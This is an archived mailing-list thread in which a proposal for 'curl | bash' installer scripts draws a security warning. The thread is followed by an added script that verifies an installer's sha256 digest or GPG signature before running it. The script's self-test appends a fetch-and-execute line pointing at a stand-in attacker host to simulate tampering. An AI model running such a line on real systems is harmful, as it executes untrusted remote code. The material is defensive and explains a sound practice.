Some articles on risks:
https://sysdig.com/blog/friends-dont-let-friends-curl-bash/
https://www.seancassidy.me/dont-pipe-to-your-shell.html
https://sandstorm.io/news/2015-09-24-is-curl-bash-insecure-pgp-verified-install

The safest way to do this is using GPG with --recv-key and --verify; I am sure with some creativity it's possible to get it into one line. I believe rvm does this.

On Fri, Jun 30, 2017 at 4:06 AM, liangqi (D) <[email protected]> wrote:

> Thanks for pointing out this security issue.
>
> I think curl | bash install is the easiest way to deploy a system, and with minimum dependencies. Could you please give some examples on how to use a checksum to ensure the script is securely executed.
>
> I saw that the head of https://get.docker.com/ has info like:
>
> ```bash
> # This script is meant for quick & easy install via:
> #   $ curl -fsSL get.docker.com -o get-docker.sh
> #   $ sh get-docker.sh
> #
> # For test builds (ie. release candidates):
> #   $ curl -fsSL test.docker.com -o test-docker.sh
> #   $ sh test-docker.sh
> #
> # NOTE: Make sure to verify the contents of the script
> #       you downloaded matches the contents of install.sh
> #       located at https://github.com/docker/docker-install
> #       before executing.
> ```
>
> Best Regards,
> Qi Liang
>
> ------------------------------
> *From:* Luke Hinds [[email protected]]
> *Sent:* Thursday, June 29, 2017 18:32
> *To:* liangqi (D)
> *Cc:* [email protected]; [email protected]; [email protected]
> *Subject:* Re: [opnfv-tech-discuss] [Infra][Pharos][Releng][Octopus] Proposal to implement installers' quickstart wrapper scripts
>
> Hi,
>
> Don't want to detract from the topic, but please do not use curl | bash, it's dangerous and if opnfv.org is ever compromised, scripts like this could be used to back door all the PODs and test sites deployed by end users.
>
> If deploying a system this way, then use a checksum (with sha256 or stronger) first to ensure the script has not been tampered with (I have examples if some are needed).
>
> Cheers,
>
> Luke
>
> On Thu, Jun 29, 2017 at 10:54 AM, liangqi (D) <[email protected]> wrote:
>
>> Hi,
>>
>> In OPNFV we have 4 installers in the Danube release, and we will have more in the next release. Each of them supports multiple scenarios and has different user install steps. This is quite confusing and difficult to use, especially for newbies.
>>
>> In releng we already have scripts to trigger all installers' deploy and test, but the scripts are CI oriented, not user oriented.
>>
>> So I propose to implement wrapper scripts in releng to provide an easy way for people to try opnfv. With minimum requirements (a server with Ubuntu 14.04/16.04 or CentOS7 installed and with internet connectivity), without checking the detailed installers' install guides, just run one command and you will get your environment ready.
>>
>> The simplest way to install an opnfv environment will be like:
>> `curl https://get.opnfv.org/ephrates/quickstart.sh | bash`
>>
>> For each installer we may have a one-command deploy like:
>> `curl https://get.opnfv.org/ephrates/compass/quickstart.sh | bash`
>>
>> Basic virtual deploy workflow:
>>
>> 1. Run command (e.g. `curl https://get.opnfv.org/ephrates/quickstart.sh | bash`)
>> 2. Check environment
>> 3. Fetch supported installers and select one installer
>> 4. Generate the deploy command and execute
>> 5. Verify the deployed environment
>> 6. Deploy success
>>
>> For BareMetal deployment the workflow is almost the same; the only difference is you need to prepare physical servers/switches, connect the cables, set up the switches, create a pod-descriptor file, and run the deploy command with the pod-descriptor file.
>>
>> The attached slide illustrates the initial idea, which was shared by Justin at the OPNFV Summit in Beijing.
>> Here is the initial script patch: https://gerrit.opnfv.org/gerrit/#/c/36711/
>>
>> @Uli, I saw you've sent the latest infra working group meeting agenda in the mailing list. Could you please include the topic in the infra working group meeting agenda.
>>
>> Welcome feedback, comments, discuss here or at the infra working group meeting.
>>
>> Best Regards,
>> Qi Liang
>>
>> _______________________________________________
>> opnfv-tech-discuss mailing list
>> [email protected]
>> https://lists.opnfv.org/mailman/listinfo/opnfv-tech-discuss
>>
>
> --
> Luke Hinds | NFV Partner Engineering | Office of Technology | Red Hat
> e: [email protected] | irc: lhinds @freenode | m: +44 77 45 63 98 84 | t: +44 12 52 36 2483

--
Luke Hinds | NFV Partner Engineering | Office of Technology | Red Hat
e: [email protected] | irc: lhinds @freenode | m: +44 77 45 63 98 84 | t: +44 12 52 36 2483
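The thread above asks for a concrete example of the "download, check a sha256 digest (or a GPG signature), then execute" pattern that Luke recommends instead of `curl ... | bash`. The script below is an added example written for this page; it is not code from the thread, from Luke, or from the OPNFV releng repository. It assumes the published digest is obtained from a channel other than the script host (release notes, a signed checksums file), and the keyserver and the KEYID argument in verify_gpg are placeholders; the quickstart URL in the comment is the one proposed in the thread. The offline demo builds its own sample script, so it runs without network access.

```shell
#!/bin/sh
# Added example (not from the opnfv-tech-discuss thread or the releng repo):
# download-then-verify as a replacement for `curl ... | bash`.
# Assumptions: the expected digest comes from a second, trusted channel, not
# from the same server that serves the script; KEYID/keyserver are placeholders.
set -eu

# digest_of FILE: print the hex SHA-256 of FILE (GNU coreutils or BSD/macOS).
digest_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# verify_sha256 FILE EXPECTED_HEX: status 0 only if the digest matches exactly.
verify_sha256() {
    [ "$(digest_of "$1")" = "$2" ]
}

# verify_gpg FILE SIG KEYID: fetch the signing key once, then check a detached
# signature. KEYID must come from documentation you already trust, never from
# the download itself. Not exercised by the offline demo below.
verify_gpg() {
    gpg --batch --keyserver hkps://keys.openpgp.org --recv-keys "$3" >/dev/null 2>&1
    gpg --batch --verify "$2" "$1"
}

# fetch_verify_run URL EXPECTED_HEX: download into a private temp dir, verify,
# and execute only on a match. Bytes never flow straight from the network into
# a shell, so a truncated or substituted script cannot run.
fetch_verify_run() {
    url=$1; expected=$2
    tmpdir=$(mktemp -d)
    script="$tmpdir/install.sh"
    rc=0
    curl -fsSL "$url" -o "$script"
    if verify_sha256 "$script" "$expected"; then
        sh "$script" || rc=$?
    else
        echo "sha256 mismatch for $url: refusing to execute" >&2
        rc=1
    fi
    rm -rf "$tmpdir"
    return "$rc"
}

# demo_offline: constructed sample (no network). Writes a small script, records
# its digest as the "published" value, checks that it verifies, then appends a
# line the way a compromised host would and checks that the copy is rejected.
demo_offline() {
    tmpdir=$(mktemp -d)
    good="$tmpdir/good.sh"
    printf '#!/bin/sh\necho hello from a verified script\n' > "$good"
    expected=$(digest_of "$good")
    ok=0; rejected=0
    verify_sha256 "$good" "$expected" && ok=1
    printf 'curl http://attacker.invalid/x | sh\n' >> "$good"
    verify_sha256 "$good" "$expected" || rejected=1
    rm -rf "$tmpdir"
    [ "$ok" = 1 ] && [ "$rejected" = 1 ]
}

# Stand-alone run. Real use would look like:
#   fetch_verify_run https://get.opnfv.org/ephrates/quickstart.sh "$PUBLISHED_SHA256"
demo_offline && echo "sha256 gate accepts the genuine script and rejects the tampered one"
```

The digest check only helps if the expected value does not travel with the script: a digest published on the same host as quickstart.sh is replaced by the same attacker who replaces the script. Publishing a GPG-signed checksums file, with the signing key fingerprint in the project documentation, closes that gap and is what verify_gpg is for.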
_______________________________________________
opnfv-tech-discuss mailing list
[email protected]
https://lists.opnfv.org/mailman/listinfo/opnfv-tech-discuss
